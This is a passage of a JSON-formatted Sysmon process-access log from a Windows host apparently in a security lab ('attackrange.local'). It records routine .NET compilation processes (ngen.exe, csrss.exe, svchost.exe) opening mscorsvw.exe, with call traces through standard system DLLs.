05:58:34.699","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00101C8C0D00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6835,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.699\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00101C8C0D00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.699","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00101C8C0D00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6836,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.714\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00101C8C0D00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.714","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00101C8C0D00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6837,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.746\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00109D8F0D00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.746","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00109D8F0D00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6838,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.746\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00109D8F0D00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.746","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00109D8F0D00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6839,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.746\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00109D8F0D00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.746","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00109D8F0D00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6840,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.777\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00108AD60C00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.777","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00108AD60C00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6841,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00108AD60C00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00108AD60C00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6842,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.793\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001006930D00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 